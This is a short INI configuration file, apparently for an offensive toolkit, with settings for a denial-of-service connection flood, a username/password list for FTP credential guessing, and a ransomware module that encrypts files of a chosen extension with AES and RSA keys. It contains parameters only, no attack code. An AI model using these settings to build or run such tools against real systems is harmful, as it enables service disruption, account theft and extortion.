[DoS]
;sleep time before connection closing
sleep=30
;number of connections to open
conns=10000

[FTP]
;usernames with possible passwords in JSON format
users_pass=user_pass_list.json

[RANSOM]
;public RSA key for AES key encryption
public=pub_key.der
;public RSA key for AES key encryption
private=priv_key.der
;modulo length, the greater the better
mod_len=8192
;file type to encrypt
ext2encrypt=.py
;AES encryption key
enc_key=enc_key.der
;initialzation vector
iv=iv.bin